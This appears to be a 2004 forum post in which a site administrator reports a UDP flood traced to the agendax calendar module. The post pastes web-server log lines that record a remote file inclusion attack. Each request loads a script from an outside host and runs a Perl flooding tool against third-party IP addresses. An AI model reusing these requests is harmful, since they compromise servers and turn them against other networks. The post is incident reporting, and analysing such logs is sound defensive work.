1
I was contacted by my network folks telling me of a udp flood attack. We traced to malicious code being run in agendax. It looks like this:
servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:28:32 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
I removed the mod for the moment. I did not find anything here. Anyone know anything?
--> Sorry, I found something deeper in the forum <--
Never mind